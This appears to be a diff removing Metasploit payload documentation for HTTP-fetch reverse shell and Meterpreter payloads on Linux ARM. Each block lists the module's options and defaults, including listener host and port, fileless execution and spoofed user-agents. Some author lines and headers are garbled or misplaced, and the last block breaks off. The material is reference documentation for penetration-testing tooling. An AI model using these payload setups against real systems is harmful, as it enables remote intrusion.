|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,93 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SHELL /bin/sh yes The shell to execute.
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
dup2 socket in x12, then execve.
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,81 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
|
||||
Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SHELL /bin/sh yes The shell to execute.
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
ok@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
